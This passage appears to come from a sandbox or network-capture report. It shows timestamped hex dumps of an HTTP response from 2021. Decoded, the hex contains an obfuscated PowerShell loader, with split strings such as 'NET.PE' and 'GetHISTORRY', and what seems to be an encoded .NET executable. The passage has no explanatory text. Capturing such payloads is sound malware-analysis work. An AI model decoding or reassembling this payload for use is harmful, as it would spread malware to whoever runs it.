                        Data Ascii: -EE95A9E59-964ADC4BE42611E2B829AF7AB3FC4683C17AA637AE8DF344BA12C1F9D4C6A55A9B28E21-BEC436FCCFD85124A3A358AAD4717E783964CB6D-DB82A7F691B3D249-6F4B7B7F693BA8D5ACEE22A62FEB2B2B2253DD56985853E77C56B65E4227D7281-46A5423F76849C415B21F997A65D54A1BFDF8F5BEC4394A5
                        2021-09-14 14:17:56 UTC380INData Raw: 44 42 37 42 32 35 33 35 36 39 46 39 43 42 32 42 46 43 35 31 36 38 32 2d 2d 45 44 43 46 33 45 38 43 46 37 45 39 35 36 45 34 32 46 36 44 42 32 32 36 41 31 39 34 33 44 31 41 46 32 36 37 37 2d 39 36 32 38 35 43 37 38 42 42 42 37 44 37 33 36 31 44 31 39 2d 34 2d 46 34 41 37 34 33 32 37 36 44 35 39 41 35 33 2d 34 42 45 42 43 35 33 44 31 39 43 41 42 33 41 35 37 37 43 39 33 45 46 41 44 31 35 35 33 46 31 37 32 2d 38 43 36 41 36 45 33 35 35 45 43 34 31 41 32 44 45 32 42 37 39 43 37 33 42 38 35 38 43 31 44 38 42 33 31 45 33 37 46 46 33 43 34 33 43 35 31 44 31 35 39 37 37 45 42 38 45 45 44 41 34 42 36 39 37 31 43 45 44 37 37 37 45 43 36 2d 36 38 33 2d 31 42 31 33 31 44 45 46 41 32 38 43 37 42 33 43 35 33 34 37 44 45 36 31 39 43 33 35 45 42 44 32 32 2d 38 42 44 45 42
                        Data Ascii: DB7B253569F9CB2BFC51682--EDCF3E8CF7E956E42F6DB226A1943D1AF2677-96285C78BBB7D7361D19-4-F4A743276D59A53-4BEBC53D19CAB3A577C93EFAD1553F172-8C6A6E355EC41A2DE2B79C73B858C1D8B31E37FF3C43C51D15977EB8EEDA4B6971CED777EC6-683-1B131DEFA28C7B3C5347DE619C35EBD22-8BDEB
                        2021-09-14 14:17:56 UTC387INData Raw: 42 34 41 43 34 34 41 43 37 31 39 37 42 38 32 2d 2d 31 39 37 31 34 43 46 32 41 31 35 35 32 43 38 46 32 33 2d 43 39 43 38 35 31 2d 41 38 46 39 43 33 38 35 33 41 2d 45 44 42 37 31 37 46 43 45 36 42 35 45 2d 42 32 44 38 32 2d 43 35 35 42 41 42 31 36 2d 35 39 31 37 41 35 34 34 43 33 35 46 43 46 34 2d 38 44 38 38 33 45 46 39 32 34 46 36 43 2d 33 36 31 42 41 46 31 35 42 45 31 44 33 31 39 43 34 35 32 33 32 32 31 37 45 37 45 42 43 44 38 34 37 46 32 39 35 43 36 32 32 46 32 44 38 45 45 35 46 37 44 37 39 36 35 32 42 43 45 37 36 45 43 42 33 37 2d 44 45 34 38 42 44 2d 31 43 39 38 36 45 45 39 46 43 43 36 37 31 31 42 36 33 32 32 44 45 46 32 45 42 44 35 37 35 37 46 44 32 39 45 36 45 32 42 39 44 43 33 34 38 32 32 37 2d 44 38 36 39 32 43 44 41 31 32 37 37 35 35 2d 41 39 39
                        Data Ascii: B4AC44AC7197B82--19714CF2A1552C8F23-C9C851-A8F9C3853A-EDB717FCE6B5E-B2D82-C55BAB16-5917A544C35FCF4-8D883EF924F6C-361BAF15BE1D319C45232217E7EBCD847F295C622F2D8EE5F7D79652BCE76ECB37-DE48BD-1C986EE9FCC6711B6322DEF2EBD5757FD29E6E2B9DC348227-D8692CDA127755-A99
                        2021-09-14 14:17:56 UTC395INData Raw: 46 44 2d 38 2d 37 31 35 41 33 41 31 36 39 43 45 46 2d 36 35 46 41 44 37 41 36 34 45 45 45 42 32 46 32 36 42 2d 33 38 2d 34 31 41 46 46 42 33 38 43 36 44 31 2d 31 31 43 45 31 35 43 2d 44 34 46 34 34 35 39 39 42 2d 43 31 36 38 2d 44 34 33 31 44 43 41 46 35 41 39 39 44 34 33 37 32 43 38 33 42 31 32 42 2d 43 33 33 32 44 34 33 32 42 46 39 37 39 2d 2d 34 41 43 44 39 31 39 34 46 32 39 32 38 44 2d 43 39 37 44 43 42 45 35 42 34 31 32 42 38 43 38 33 38 44 34 33 44 2d 42 35 36 46 35 43 36 2d 36 33 44 41 41 34 41 39 35 45 44 31 43 46 33 43 39 34 33 45 39 43 42 41 36 35 2d 33 39 37 35 44 36 2d 44 39 31 43 37 39 34 35 33 2d 45 31 39 34 46 36 37 39 34 39 41 41 35 34 38 46 46 46 33 34 31 38 2d 44 31 38 31 32 35 31 2d 32 43 37 37 42 44 45 41 41 41 46 42 35 2d 46 45 43 43
                        Data Ascii: FD-8-715A3A169CEF-65FAD7A64EEEB2F26B-38-41AFFB38C6D1-11CE15C-D4F44599B-C168-D431DCAF5A99D4372C83B12B-C332D432BF979--4ACD9194F2928D-C97DCBE5B412B8C838D43D-B56F5C6-63DAA4A95ED1CF3C943E9CBA65-3975D6-D91C79453-E194F67949AA548FFF3418-D181251-2C77BDEAAAFB5-FECC
                        2021-09-14 14:17:56 UTC402INData Raw: 45 37 45 39 37 32 44 46 46 45 45 35 36 38 39 2d 39 37 41 37 32 33 33 45 36 37 35 45 37 2d 36 42 42 46 44 46 39 43 45 36 41 39 35 43 41 36 34 41 42 38 31 46 33 36 38 45 33 34 37 41 33 37 45 37 43 31 37 33 36 2d 31 35 34 46 42 31 43 33 38 42 31 39 46 38 41 35 39 36 43 2d 34 43 41 42 43 32 44 32 41 33 33 46 37 32 32 31 43 33 43 45 34 31 41 46 34 41 31 33 36 43 2d 45 43 44 35 45 36 41 43 2d 38 43 45 31 37 39 31 32 45 42 45 45 44 42 33 44 31 34 31 43 35 35 32 42 2d 44 34 33 37 33 41 42 35 36 31 42 44 38 32 38 41 45 2d 46 36 33 39 36 38 42 38 45 33 38 2d 44 43 43 41 45 45 41 46 41 33 2d 42 31 43 36 36 41 32 43 46 35 44 42 33 41 32 32 37 37 39 36 43 41 34 41 35 2d 44 43 43 42 2d 36 41 45 46 44 33 43 2d 34 34 39 32 44 41 36 37 33 36 32 45 2d 44 39 45 37 42 32 41
                        Data Ascii: E7E972DFFEE5689-97A7233E675E7-6BBFDF9CE6A95CA64AB81F368E347A37E7C1736-154FB1C38B19F8A596C-4CABC2D2A33F7221C3CE41AF4A136C-ECD5E6AC-8CE17912EBEEDB3D141C552B-D4373AB561BD828AE-F63968B8E38-DCCAEEAFA3-B1C66A2CF5DB3A227796CA4A5-DCCB-6AEFD3C-4492DA67362E-D9E7B2A
                        2021-09-14 14:17:56 UTC409INData Raw: 42 38 2d 41 43 43 2d 35 33 39 37 45 39 41 32 43 32 37 33 35 43 38 41 42 41 46 41 2d 38 34 38 36 43 39 42 34 45 39 31 34 39 38 31 33 32 36 45 36 39 42 38 42 33 2d 2d 46 34 41 34 38 35 41 46 36 2d 46 45 43 43 44 42 32 45 43 35 36 41 31 34 41 42 39 37 37 42 46 45 32 45 38 37 44 31 38 32 41 33 2d 44 2d 37 43 2d 36 31 32 36 45 32 39 46 44 31 46 36 43 45 44 33 45 39 42 36 32 33 33 31 33 33 34 43 39 32 33 33 31 44 32 35 31 46 44 2d 43 46 43 45 38 33 31 45 45 37 41 37 32 33 41 42 44 44 36 45 2d 32 37 42 46 42 42 32 41 43 31 45 45 37 32 37 33 32 2d 33 33 45 31 2d 45 33 34 37 44 33 38 2d 33 34 34 42 42 38 31 38 37 32 33 44 41 36 46 46 39 44 38 37 41 45 34 46 34 36 43 36 2d 42 43 38 39 39 35 33 39 31 31 36 34 43 38 37 43 36 41 34 34 45 35 35 37 46 44 34 36 43 34 36
                        Data Ascii: B8-ACC-5397E9A2C2735C8ABAFA-8486C9B4E914981326E69B8B3--F4A485AF6-FECCDB2EC56A14AB977BFE2E87D182A3-D-7C-6126E29FD1F6CED3E9B62331334C92331D251FD-CFCE831EE7A723ABDD6E-27BFBB2AC1EE72732-33E1-E347D38-344BB818723DA6FF9D87AE4F46C6-BC8995391164C87C6A44E557FD46C46
                        2021-09-14 14:17:56 UTC416INData Raw: 2d 36 39 2d 36 65 2d 36 34 2d 36 39 2d 36 65 2d 36 37 2d 32 38 2d 32 39 2d 35 64 2d 30 61 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 35 62 2d 34 66 2d 37 35 2d 37 34 2d 37 30 2d 37 35 2d 37 34 2d 35 34 2d 37 39 2d 37 30 2d 36 35 2d 32 38 2d 35 62 2d 36 32 2d 37 39 2d 37 34 2d 36 35 2d 35 62 2d 35 64 2d 35 64 2d 32 39 2d 35 64 2d 30 61 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 37 30 2d 36 31 2d 37 32 2d 36 31 2d 36 64 2d 32 38 2d 30 61 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 35 62 2d 35 30 2d 36 31 2d 37 32 2d 36 31 2d 36 64 2d 36 35 2d 37 34 2d 36 35 2d 37 32 2d 32 38 2d 34 64 2d 36 31 2d 36 65 2d 36 34 2d 36 31 2d 37 34 2d 36 66 2d 37 32 2d 37 39 2d 33 64 2d 32 34 2d 37 34 2d 37 32 2d 37 35 2d 36 35 2d 32 39 2d 35 64 2d 32 30
                        Data Ascii: -69-6e-64-69-6e-67-28-29-5d-0a-20-20-20-20-5b-4f-75-74-70-75-74-54-79-70-65-28-5b-62-79-74-65-5b-5d-5d-29-5d-0a-20-20-20-20-70-61-72-61-6d-28-0a-20-20-20-20-20-20-20-20-5b-50-61-72-61-6d-65-74-65-72-28-4d-61-6e-64-61-74-6f-72-79-3d-24-74-72-75-65-29-5d-20
                        2021-09-14 14:17:56 UTC424INData Raw: 33 31 2d 33 30 2d 33 36 2d 33 31 2d 34 36 2d 33 32 2d 33 39 2d 33 39 2d 33 34 2d 33 31 2d 33 33 2d 33 30 2d 33 37 2d 33 31 2d 33 36 2d 33 31 2d 33 33 2d 33 30 2d 33 38 2d 33 37 2d 34 35 2d 33 30 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 34 2d 33 30 2d 33 39 2d 33 37 2d 34 32 2d 33 30 2d 34 32 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 34 2d 33 31 2d 33 31 2d 33 30 2d 33 37 2d 33 31 2d 34 31 2d 34 34 2d 33 36 2d 33 31 2d 34 31 2d 34 34 2d 33 36 2d 33 31 2d 33 32 2d 33 30 2d 33 38 2d 33 31 2d 34 31 2d 33 31 2d 33 32 2d 33 30 2d 33 30 2d 33 36 2d 34 36 2d 33 32 2d 33 34 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 31 2d 33 36 2d 34 36 2d 34 35 2d 33 30 2d 33 31 2d 33 31 2d 33 33 2d 33 31 2d 33 35 2d 33 31 2d 33 31 2d
                        Data Ascii: 31-30-36-31-46-32-39-39-34-31-33-30-37-31-36-31-33-30-38-37-45-30-38-30-30-30-30-30-34-30-39-37-42-30-42-30-30-30-30-30-34-31-31-30-37-31-41-44-36-31-41-44-36-31-32-30-38-31-41-31-32-30-30-36-46-32-34-30-30-30-30-30-36-31-36-46-45-30-31-31-33-31-35-31-31-
                        2021-09-14 14:17:56 UTC431INData Raw: 30 2d 33 30 2d 33 30 2d 33 30 2d 33 37 2d 33 30 2d 33 32 2d 33 30 2d 33 37 2d 33 37 2d 34 35 2d 34 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 34 2d 34 34 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 32 2d 33 30 2d 33 36 2d 34 35 2d 34 35 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 34 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 32 2d 33 30 2d 33 31 2d 33 36 2d 34 36 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 33 2d 33 39 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 32 2d 33 30 2d 33 36 2d 34 31 2d 34 35 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 32 2d 34 36 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33
                        Data Ascii: 0-30-30-30-37-30-32-30-37-37-45-45-30-30-30-30-32-38-34-44-30-30-30-30-30-36-32-30-36-45-45-38-30-30-30-30-32-38-34-33-30-30-30-30-30-36-32-30-31-36-46-33-30-30-30-30-32-38-33-39-30-30-30-30-30-36-32-30-36-41-45-31-30-30-30-30-32-38-32-46-30-30-30-30-30-3
                        2021-09-14 14:17:56 UTC438INData Raw: 2d 33 31 2d 34 33 2d 33 36 2d 33 33 2d 33 36 2d 33 36 2d 33 31 2d 34 33 2d 33 36 2d 33 33 2d 33 32 2d 34 32 2d 33 34 2d 33 39 2d 33 32 2d 33 38 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 30 2d 33 36 2d 33 32 2d 33 38 2d 33 31 2d 33 37 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 32 2d 34 32 2d 33 36 2d 33 31 2d 33 31 2d 33 32 2d 33 30 2d 33 32 2d 33 32 2d 33 38 2d 33 31 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 32 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 33 2d 33 36 2d 33 30 2d 33 32 2d 33 32 2d 34 32 2d 33 30 2d 34 33 2d 33 32 2d 34 32 2d 33 34 2d 33 35 2d 33 33
                        Data Ascii: -31-43-36-33-36-36-31-43-36-33-32-42-34-39-32-38-31-30-30-30-30-30-30-41-30-36-32-38-31-37-30-30-30-30-30-41-32-42-36-31-31-32-30-32-32-38-31-38-30-30-30-30-30-41-32-33-30-30-30-30-30-30-30-30-30-30-30-30-30-30-30-30-33-36-30-32-32-42-30-43-32-42-34-35-33
                        2021-09-14 14:17:56 UTC445INData Raw: 33 38 2d 33 36 2d 33 35 2d 33 32 2d 33 30 2d 34 32 2d 34 33 2d 34 36 2d 33 38 2d 33 37 2d 33 32 2d 33 30 2d 33 33 2d 33 32 2d 33 30 2d 34 32 2d 33 36 2d 34 36 2d 33 38 2d 33 37 2d 33 32 2d 33 30 2d 33 33 2d 33 35 2d 33 39 2d 33 32 2d 33 30 2d 33 33 2d 33 32 2d 33 33 2d 33 39 2d 33 34 2d 34 31 2d 33 31 2d 33 33 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 37 2d 33 37 2d 33 37 2d 33 36 2d 34 32 2d 33 35 2d 33 32 2d 33 35 2d 33 35 2d 33 38 2d 33 32 2d 33 30 2d 33 36 2d 34 31 2d 33 33 2d 34 34 2d 33 36 2d 34 32 2d 33 31 2d 33 32 2d 33 35 2d 33 39 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 34 35 2d 33 32 2d 34 34 2d 33 32 2d 34 32 2d 33 36 2d 33 31 2d 33 36 2d 33 32 2d 33 30 2d 33 31 2d 34 35 2d 33 31 2d 34 34 2d 33 34 2d 33 39 2d 34 35 2d 33 39 2d 33 35 2d 33 38 2d
                        Data Ascii: 38-36-35-32-30-42-43-46-38-37-32-30-33-32-30-42-36-46-38-37-32-30-33-35-39-32-30-33-32-33-39-34-41-31-33-36-36-32-30-37-37-37-36-42-35-32-35-35-38-32-30-36-41-33-44-36-42-31-32-35-39-36-36-32-30-45-32-44-32-42-36-31-36-32-30-31-45-31-44-34-39-45-39-35-38-
                        2021-09-14 14:17:56 UTC453INData Raw: 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 33 2d 33 38 2d 34 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 32 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 37 2d 33 39 2d 33 32 2d 34 33 2d 34 36 2d 34 36 2d 33 32 2d 33 37 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 32 2d 33 35 2d 33 36 2d 33 31 2d 34 31 2d 33 38 2d 33 30 2d 33 31 2d 33 35 2d 33 39 2d 33 32 2d 33 30 2d 33 32 2d 33 36 2d 34 35 2d 33 38 2d 34 36 2d 34 36 2d 33 32 2d 33 32 2d 33 35 2d 33 38 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 37 2d 33 30 2d 34 31 2d 33 35 2d 34 31 2d 33 37 2d 33 30 2d 33 36 2d 33 35 2d 33 39 2d 33 32 2d 33 38 2d 33 31 2d 34 36 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 32 2d 34 32 2d 33 33 2d 33 39 2d 33 31 2d 33
                        Data Ascii: 0-30-30-30-30-41-33-38-41-30-30-30-30-30-30-30-31-32-30-30-32-30-37-39-32-43-46-46-32-37-36-36-32-30-32-35-36-31-41-38-30-31-35-39-32-30-32-36-45-38-46-46-32-32-35-38-36-36-32-30-37-30-41-35-41-37-30-36-35-39-32-38-31-46-30-30-30-30-30-41-32-42-33-39-31-3
                        2021-09-14 14:17:56 UTC460INData Raw: 2d 34 36 2d 34 35 2d 33 30 2d 33 39 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 34 36 2d 33 36 2d 33 31 2d 33 32 2d 34 35 2d 34 36 2d 34 32 2d 34 34 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 32 2d 34 35 2d 33 35 2d 33 37 2d 34 35 2d 33 30 2d 34 36 2d 33 38 2d 33 35 2d 33 38 2d 33 32 2d 33 30 2d 34 32 2d 34 36 2d 33 30 2d 33 32 2d 33 30 2d 34 34 2d 34 34 2d 34 34 2d 33 36 2d 33 31 2d 33 36 2d 33 36 2d 33 36 2d 33 35 2d 33 32 2d 33 30 2d 34 32 2d 33 31 2d 34 34 2d 34 33 2d 34 34 2d 33 32 2d 33 31 2d 33 38 2d 33 36 2d 33 31 2d 33 36 2d 33 35 2d 33 32 2d 33 30 2d 33 34 2d 33 37 2d 33 39 2d 34 31 2d 33 32 2d 34 35 2d 34 36 2d 34 36 2d 33 35 2d 33 38 2d 33 35 2d 34 36 2d 33 39 2d 33 31 2d 34 36 2d 34 35 2d 33 30 2d 33 39 2d 33 30 2d 33 32 2d 33 30
                        Data Ascii: -46-45-30-39-30-32-30-30-32-30-46-36-31-32-45-46-42-44-36-36-32-30-32-45-35-37-45-30-46-38-35-38-32-30-42-46-30-32-30-44-44-44-36-31-36-36-36-35-32-30-42-31-44-43-44-32-31-38-36-31-36-35-32-30-34-37-39-41-32-45-46-46-35-38-35-46-39-31-46-45-30-39-30-32-30
                        2021-09-14 14:17:56 UTC467INData Raw: 33 34 2d 33 30 2d 33 30 2d 34 34 2d 33 37 2d 33 30 2d 33 32 2d 33 33 2d 33 36 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 32 2d 34 34 2d 34 32 2d 33 30 2d 33 32 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 33 2d 33 35 2d 33 30 2d 33 32 2d 34 36 2d 33 32 2d 33 30 2d 33 31 2d 33 33 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 34 35 2d 34 33 2d 33 30 2d 33 32 2d 33 33 2d 33 36 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 30 2d 34 36 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 33 2d 33 30 2d 33 30 2d 33 30 2d 34 36 2d 33 32 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 39 2d 33 31 2d 33 32 2d 33 30 2d 34 32 2d 33 35 2d
                        Data Ascii: 34-30-30-44-37-30-32-33-36-30-30-42-45-30-32-44-42-30-32-30-31-30-30-43-35-30-32-46-32-30-31-33-31-30-30-42-35-30-30-45-43-30-32-33-36-30-30-42-45-30-30-46-30-30-32-30-31-30-30-43-30-30-30-46-32-30-31-30-30-30-30-30-30-30-30-38-30-30-30-39-31-32-30-42-35-
                        2021-09-14 14:17:56 UTC474INData Raw: 30 2d 33 32 2d 34 31 2d 34 32 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 38 2d 34 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33
                        Data Ascii: 0-32-41-42-30-30-30-30-32-30-30-31-30-30-42-35-30-30-30-30-30-30-30-31-30-30-42-35-30-30-30-30-32-30-30-32-30-30-42-45-30-30-30-30-30-30-30-31-30-30-42-35-30-30-30-30-30-30-30-32-30-30-42-45-30-30-30-30-30-30-30-31-30-30-38-43-30-30-30-30-30-30-30-32-30-3
                        2021-09-14 14:17:56 UTC481INData Raw: 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 34 32 2d 33 32 2d 33 30 2d 33 30 2d 34 34 2d 33 31 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 34 36 2d 33 34 2d 33 30 2d 33 32 2d 34 34 2d 33 39 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 34 32 2d 33 32 2d 33 30 2d 33 30 2d 34 35 2d 33 31 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 32 2d 33 31 2d 33 30 2d 33 33 2d 34 36 2d 33 31 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 33 2d 33 30 2d 33 30 2d 33 33 2d 34 36 2d 33 39 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 33 2d 33 30 2d 33 30 2d 33 33 2d 33 30 2d 33 31 2d 33 30 2d 33 31 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 33 2d 33 30 2d 33 30 2d 33 33 2d 33 30 2d 33 39 2d 33 30 2d 33 31 2d 34 36
                        Data Ascii: -46-33-30-33-42-32-30-30-44-31-30-30-46-33-30-33-46-34-30-32-44-39-30-30-46-33-30-33-42-32-30-30-45-31-30-30-46-33-30-33-32-31-30-33-46-31-30-30-46-33-30-33-33-30-30-33-46-39-30-30-46-33-30-33-33-30-30-33-30-31-30-31-46-33-30-33-33-30-30-33-30-39-30-31-46
                        2021-09-14 14:17:56 UTC489INData Raw: 33 30 2d 33 35 2d 33 33 2d 33 37 2d 33 34 2d 33 37 2d 33 32 2d 33 36 2d 33 39 2d 33 36 2d 34 35 2d 33 36 2d 33 37 2d 33 30 2d 33 30 2d 33 36 2d 33 37 2d 33 36 2d 33 35 2d 33 37 2d 33 34 2d 33 35 2d 34 36 2d 33 34 2d 34 33 2d 33 36 2d 33 35 2d 33 36 2d 34 35 2d 33 36 2d 33 37 2d 33 37 2d 33 34 2d 33 36 2d 33 38 2d 33 30 2d 33 30 2d 33 36 2d 33 39 2d 33 30 2d 33 30 2d 33 36 2d 34 31 2d 33 30 2d 33 30 2d 33 34 2d 33 31 2d 33 37 2d 33 33 2d 33 37 2d 33 39 2d 33 36 2d 34 35 2d 33 36 2d 33 33 2d 33 34 2d 33 33 2d 33 36 2d 33 31 2d 33 36 2d 34 33 2d 33 36 2d 34 33 2d 33 36 2d 33 32 2d 33 36 2d 33 31 2d 33 36 2d 33 33 2d 33 36 2d 34 32 2d 33 30 2d 33 30 2d 33 34 2d 34 34 2d 33 36 2d 33 31 2d 33 37 2d 33 32 2d 33 37 2d 33 33 2d 33 36 2d 33 38 2d 33 36 2d 33 31 2d
                        Data Ascii: 30-35-33-37-34-37-32-36-39-36-45-36-37-30-30-36-37-36-35-37-34-35-46-34-43-36-35-36-45-36-37-37-34-36-38-30-30-36-39-30-30-36-41-30-30-34-31-37-33-37-39-36-45-36-33-34-33-36-31-36-43-36-43-36-32-36-31-36-33-36-42-30-30-34-44-36-31-37-32-37-33-36-38-36-31-
                        2021-09-14 14:17:56 UTC496INData Raw: 30 2d 33 35 2d 33 30 2d 33 38 2d 33 30 2d 33 34 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 38 2d 33 30 2d 33 39 2d 33 30 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 33 2d 34 34 2d 33 30 2d 33 38 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 30 2d 34 33 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 33 30 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 33 34 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 33 38 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 34 33 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 32 2d 33
                        Data Ascii: 0-35-30-38-30-34-30-30-30-31-30-38-30-39-30-35-30-30-30-31-31-32-33-44-30-38-30-34-30-41-30-31-31-32-30-43-30-34-30-41-30-31-31-32-31-30-30-34-30-41-30-31-31-32-31-34-30-34-30-41-30-31-31-32-31-38-30-34-30-41-30-31-31-32-31-43-30-34-30-41-30-31-31-32-32-3
                        2021-09-14 14:17:56 UTC503INData Raw: 2d 33 34 2d 33 33 2d 33 30 2d 33 30 2d 33 36 2d 34 36 2d 33 30 2d 33 30 2d 33 36 2d 34 34 2d 33 30 2d 33 30 2d 33 36 2d 34 34 2d 33 30 2d 33 30 2d 33 36 2d 33 35 2d 33 30 2d 33 30 2d 33 36 2d 34 35 2d 33 30 2d 33 30 2d 33 37 2d 33 34 2d 33 30 2d 33 30 2d 33 37 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 32 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 34 2d 33 33 2d 33 30 2d 33 30 2d 33 36 2d 34 36 2d 33 30 2d 33 30 2d 33 36 2d 34 34 2d 33 30 2d 33 30 2d 33 37 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 31 2d 33 30 2d 33 30 2d 33 36 2d 34 35 2d 33 30 2d 33 30 2d 33 37 2d 33 39 2d 33 30 2d 33 30 2d 33 34
                        Data Ascii: -34-33-30-30-36-46-30-30-36-44-30-30-36-44-30-30-36-35-30-30-36-45-30-30-37-34-30-30-37-33-30-30-30-30-30-30-30-30-30-30-30-30-30-30-32-32-30-30-30-31-30-30-30-31-30-30-34-33-30-30-36-46-30-30-36-44-30-30-37-30-30-30-36-31-30-30-36-45-30-30-37-39-30-30-34
                        2021-09-14 14:17:56 UTC510INData Raw: 37 39 2d 37 34 2d 36 35 2d 35 62 2d 35 64 2d 35 64 2d 32 34 2d 34 38 2d 33 36 2d 33 64 2d 32 30 2d 35 36 2d 34 39 2d 35 30 2d 32 30 2d 32 34 2d 34 38 2d 34 38 2d 30 61 2d 32 34 2d 36 31 2d 36 31 2d 32 30 2d 33 64 2d 32 30 2d 32 37 2d 34 65 2d 34 35 2d 35 34 2d 32 65 2d 35 30 2d 34 35 2d 32 37 2d 30 61 2d 32 34 2d 36 32 2d 36 32 2d 32 30 2d 33 64 2d 32 30 2d 32 37 2d 34 32 2d 36 31 2d 36 34 2d 36 37 2d 36 35 2d 37 32 2d 32 37 2d 30 61 2d 32 34 2d 36 66 2d 36 66 2d 32 30 2d 33 64 2d 32 37 2d 34 37 2d 36 35 2d 37 34 2d 34 38 2d 34 39 2d 35 33 2d 35 34 2d 34 66 2d 35 32 2d 35 32 2d 35 39 2d 32 37 2d 32 65 2d 35 32 2d 36 35 2d 37 30 2d 36 63 2d 36 31 2d 36 33 2d 36 35 2d 32 38 2d 32 32 2d 34 38 2d 34 39 2d 35 33 2d 35 34 2d 34 66 2d 35 32 2d 35 32 2d 35 39 